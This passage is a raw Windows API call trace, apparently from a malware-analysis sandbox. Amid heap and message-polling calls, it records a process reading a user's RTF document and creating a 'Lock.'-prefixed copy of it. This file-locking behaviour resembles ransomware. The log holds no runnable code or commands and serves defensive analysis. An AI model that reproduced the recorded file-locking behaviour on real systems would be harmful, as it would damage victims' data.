(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/B1NB4QkFt.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b1nb4qkft.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0261.079] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0261.079] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0261.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0261.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.080] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.B1NB4QkFt.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.b1nb4qkft.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0261.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0261.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0261.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0261.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.082] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0261.082] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xd827, lpOverlapped=0x0) returned 1 [0261.085] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0261.088] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0261.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd827) returned 0x24b7a48 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.090] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0261.090] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.091] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0261.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd827) returned 0x24b7a48 [0261.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd827) returned 0x24d2aa8 [0261.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0261.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0261.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.095] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.096] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0261.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.097] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.099] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0261.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.100] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.100] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.101] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.101] 